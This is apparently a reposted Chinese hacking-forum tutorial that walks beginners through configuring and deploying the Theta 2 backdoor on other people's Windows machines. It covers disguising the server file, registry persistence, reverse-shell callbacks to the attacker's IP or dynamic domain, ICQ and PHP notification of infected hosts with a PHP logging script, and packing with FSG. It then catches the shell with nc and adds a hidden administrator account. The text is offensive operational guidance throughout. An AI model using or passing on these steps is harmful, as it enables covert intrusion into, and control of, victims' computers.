Theta 2配置和使用详解

linker

by:iceskysl

原文在《黑客Xiceskysl档案》已经刊登）

凡是接触黑界的朋友都知道WINSHELL吧！这可是大名鼎鼎的后门哦！它的主要的特点就是个头小，功能齐全，但是它唯一的不足就是它不提供反弹连接，这在我们去拿装有防火墙的主机的权限时候就觉得力不从心了，明明是把5277打口打开了，却连接不了，这是最郁闷的事情，于是乎，我们就到处寻找个头小，又可以反弹连接的木马，或者是后门。但是找到的要不就是太大，要不就是不可以反弹连接，直到一天，笔者以前就看过Theta的简介，它的名气也很大，被界内的人称为国外的WINSHELL，呵呵~功能很是了得啊，但是Theta 1出来的时候也没有反弹连接的功能，而且也没有密码保护的功能，虽然它的个头也比较的小，但是当时和我们的国产的WINSHELL比，还是比不赢啊！前几去Theta的作者grirai的主页上看时，发现已经推出了Theta 2，赶忙下载下来，看了它的英文简介，吓我一跳啊！功能太强大了，把他的使用方法研究了一下，发现这个小个子的后门真的很好用，不敢独享，写出来和大家分享。写的很详细，主要是针对新手的，高手可以跳着看重点就好了，不要见笑！

Theta 2的新特点：

Theta 2新增了反弹连接的功能，改进了Theta 1的一些句柄和内存泄露的错误，（这个地方我原来一直搞不明白作者是说什么，幸亏s1eky指点，在这里谢谢s1eky了）新增加密码保护功能，把Theta 1的CGI通知上线方式改为PHP方式。Theta 2很小，客户端就33.3Kb(包括加壳的工具FSG)，生成的服务端就只有6.4K，作者说要不是因为要支持9*的系统，那服务端可以做的更小，估计只有4K左右，它可以提供所有的DOS下的功能，它只有一个服务端，运行后就注入到别的进程了，（NT系统注入到"winlogon.exe"中，非NT的系统注入到"systray.exe"中）所以它还有一个比WINSHELL要好的功能就是可以隐藏进程，另外这么小的后门还支持反弹连接是我觉得最出彩的地方，听上去很强吧。不要着急，先看图1是它的客户端的界面，和WINSHELL真的很像是吧！具体配置和使用我下面会慢慢讲到的。





Theta 2的配置：我们下载下来的压缩包就有服务端生成器，用MD5检测它的MD5散列是：69B776EC9F94ADB0D9E2AD11602C97B5，如果你检测到的散列不对的话，那说明你下的软件被人修改了，或者感染了别的什么东西，反正就不是原来的那个了，你最好是删点它，去作者的主页去下载，或者在光盘里找到它。它的服务端由客户端直接生成，这和WINSHELL差不多吧！下面结合图2，我来详细的讲下它的配制的各个项的意思和要注意的事件。


General Settings：


“Server File”:这就是文件的名字，它在注入的时候就是以这个名字的形式把自己放在系统盘里的，随便填写，最好是可以和系统原来就有的一些文件很相似，这样可以更好的隐藏自己，但是要注意不要写的和系统原来就有的文件一样，这样的话，在它运行的时候它会把原来系统的文件修改或者覆盖掉会使得原来的系统文件不能正常工作，当然这是我们不想要的。我在这里写的是thServer.exe。


“Port”:这是后门运行后在主机上监听的端口，原则上是随便填的，但是作者说最后是填大一点的端口，这样的话，我们好认识我们设置的端口，还有就是不要担心你填的端口和主机的在用的端口会冲突，要是真的冲突的话，后门自己会选择一个没有用的端口来监听，当然它会想办法通知你了，具体是用什么办法通知你，我们在后面会说到。我这里用的是51000。


“Server ID”:后门的标识，你可以任意的设置，最好是你自己可以认出，当你连接的时候，或者在后门通知我们的时候，你可以认出这是你的后门。但是也不要太有个性，免得被发现哦！大家看图2，我用的是theta，当然你可以自己填咯。


“Registry Key”:大家一看就知道，一旦这个后门运行后，在注册表了填加了这个名字后，后门就不能删去了，具体的删除的办法我后面会讲到，是在注册表里添加的项的名字，你可以随便取，最好有点欺骗的名字会更好的。我主要是演示给大家看，随便设置的是ThServe了。


“Password”:这是theta 2新加的功能，原来的theta 1是没有密码保护功能的，在这里你可以任意设置后门的连接密码，当然要是你不想要密码的话，留着空的就行了！我在这里设置的是1234567890。


“Automatically start with Windows, and lock server file” ：这是个复选框，就像名字说的那样，它可以防止文件或者在注册表里添加的项被删掉，同时使的后门随着系统的启动而启动。也许你要问，要是我们把文件和注册表里的项删掉的话，那后门还会运行吗？呵呵！其实在注册表里或者在系统盘里的文件并不是后门的真正在运行的，后门运行的是另外的进程，那已经注入到别的进程里了，所以呢，就是被删掉也没有关系的。这里要说明的是，要是你在自己的机子上做实验或者说你不想让后门以后再启动了，那就别选，或者，你就选上吧！选上后我们也可以也可以连接的时候卸掉它的，具体方法后面回讲到，不要担心。

Connection Settings：（连接设置）

“Direct Connection”:直接连接选项设置，主要是应用在主机的IP是公网的IP，或者你想连接的机子和你在同一个局域网里，也就是你可以找到它的IP的话，而且主机没有防火墙的情况下使用的，这里不需要设置什么，记得我们前面设置“Port”吗，这就是我们设置的后门监听的端口，我们连接的时候也是直接连接就行了，这里我没有选。

“Reverse Connection”:反弹连接选项。我认为这就是这个后门最出彩的地方，要是主机用了代理或者在局域网里的话，就算他中了我们的后门，我们也在网络上找不到他们的IP的时候，当然我们用的最多情况是主机有防火墙，不允许我们连接它的时候，这是我们就需要这个设置了，让它来找我们。我这里用这个反弹连接来演示的，当我们选上这个单选框的时候，上面设置的Port就没有用了，具体的设置在下面的两个框子里。

“SIN Port”:这里是设置让中了后门的机子来连接我们的端口号，随你的便了，当然是你自己的主机没有在用的端口了。我们要做的就是用NC来监听这个端口就行了。我用的是50000。你想用什么，自己设置。

“SIN Address”:这里设置的是你的计算机的名字或者IP，是让后门反弹连接的主机的IP啦！如果你有个固定的公网IP，那就把你的IP填上就行了；要是你只想连接到你的一个局域网的主机你把你内网的IP写上也可以。比如我这里就是这样的，我在内网，我把我的内网的IP（192.168.3.54）写上去。要是你想让不和你在同个内网的机子来连接你的话，但是你的IP不固定，也就是说你是用拨号上网的话，这里你需要在http://no-ip.info注册一个账号，比如你申请到的是“you.no-ip.info”,那就在这里填上“you.no-ip.info”,（注意没有引号）大家也许发现了，这样的配置就像灰鸽子用*.yeah.net中转的一样，但是这里不能自动更新，我们还要去下载一个“no-ip.info”的 IP更新的客户端，你上网的时候就要打开这个客户端，把你的IP更新上去。如果你在局域网，没有自己的公网IP的话，你可以去找找以前的X档案，那里有几篇文章上说怎么样局域网里打造自己公网IP的，方法很多，不在详述。反向连接设置好了后，中了后门的机子每隔5秒就向你设置的IP和端口连接一下，一直到连接成功为止，如果你和后门之间的连接突然断掉了，它会再隔5秒来连接你一下的，直到连接成功。

Notifications：（通知方式）在这里，我将介绍一下后门是怎么样通知我们哪个机子中了我们的后门的机子的IP和监听的端口号：

ICQ Notification：ICQ通知，这个也是比较先进的技术，我认为这就很好，很是方便啊，要是哪天过产的后门木马能把这个功能用在OICQ上就好了，那就好了。好像Theta还是先例哦！你要是有ICQ的话，就选上那个复选框，再在后面填上你的ICQ的号码就是了，当有机子中了你的后门的时候，会通过ICQ来告诉你，消息的具体的格式是："Hello <port number>, blah..."。但是由于ICQ的客户端不一样，加上服务器的限制也不一样，你收到的消息可能也不一样，主要也就是消息的详细程度不一样，有的会说明中的后门的“Server ID”，有的不会，但是这好像并不重要，你去连接的时候就知道是什么“Server ID”了。

PHP Notification：（PHP页面通知）这里改了以前theta 1的GCI的通知方式而改用PHP页面了，具体原因不晓得了，当然你要用这个功能的时候你必须要有一个支持PHP的空间，你要是有自己的PHP空间更好，要是没有，作者提供了http://netfirms.com来申请（但是笔者申请的时老是不成功，不晓得是什么原因）当然你去别的地方申请也可以的只要有个空间就行了，再把下面这段话保存为log.php上传到你的空间上：

/*- Extremly Simple PHP Notificaion Script -

This will append all notifications to a file "log.txt", in the following format:

ServerID:<ServerID>_IP:<IP>_Port:<ort>

It's recommended to chmod "log.txt" to 600.

You will access/download the file by logging in to your account via FTP

If you don't chmod it, you can access it via a browser too (not recommended, others can see it too).*/

<?php

$fp = fopen ("log.txt", "a");

fwrite ($fp, chr(13).chr(10).$_GET['noti']);

fclose ($fp);

?>

如果你的空间里有个文件夹wenjian，你把上面的log.php放在他的下面，那你在填host和path的时候就要注意了，有点不一样的！首先是选上那个前面的复选框，再在host里填上你的空间的站名，比如：www.yourdomain.com。在path里要这样填写，如果你的log.php是放在根目录下面的，那就在path里直接写上log.php就好了，要是你的log.php在一个文件夹里的话，那就要注意了，比如在“wenjian”这个文件夹里，那在path里就要这样写了”：“/ wenjian/log.php”(注意没有引号)也就是说要是在根目录下的话，前面不要那个“/”，要是在文件夹里的话，那前面一定要有“/”就像：“/folder1/folder2 /log.php”这样。好了，上面的就配置好了，你去看你的log.php的时候就可以看到中了后门的机子的IP和Port了，格式是这样的：“log.php?noti=ServerID:<ServerID>_IP:<IP>_Port:<ort>” 。

需要注意的是，一定要设置正确。而且你的空间还有空闲。好了，具体的看我的图2上写的吧，最后我们就点Generate这个按扭，它就自动给服务端加FSG的壳，（这个壳真的比较NB）加完壳后,点“是”退出，我们在同个目录下就可以看到生成的服务端：theta_server.exe了，这个就是我们要给别人运行的。

好了，配置好了，我们来看看它的功能，它提供你在DOS下的所有功能，另外自带了三个功能，代号分别是：@X;@R;@B。其中@X是断开连接，这个在我们和主机连接完成要退出的时候用的，可以自动清除我们在主机上留下的痕迹，所以推荐大家使用。@B是让对方的机子重新启动。@R是卸载对方的后门Theta，这个是在年不想留下这个后门，或者你自己不小心运行了服务端的情况下，就自己连接自己，再卸载掉就好了！

下面我们来看看具体的操作，如果是直接连接的话，就用NC IP PORT就行了，如果有密码就输入你的密码，很简单，我不再多说。现在我就在内网演示下他最出彩的功能，反弹连接吧！看我图2的配置，我的机子的IP是192.168.3.54，我用RECTON.exe（知道是什么吗？不晓得的话就去看11期的X吧，呵呵~上面有介绍）的种植功能把后门服务端theta_server种在另外一个机子192.168.3.43的D盘上。

我们在本地监听5000端口：nc.exe –l -p 50000,回车后，提示输入连接密码，我输入我们刚刚设置的1234567890回车：看到了吗？我们进入对方的系统了，看看权限怎么样，加个用户试试：”net user theta /add&net localgroup administrators theta /add”。命令成功完成！呵呵~~搞定！别的命令都可以用的，凡是你在DOS下面可以用的在这里都可以用，你甚至可以用TFTP/FTP去下载别的木马或者后门来运行，好了，就这样吧！

xdoecibn

好 好帖 很好帖 确实好帖 少见的好帖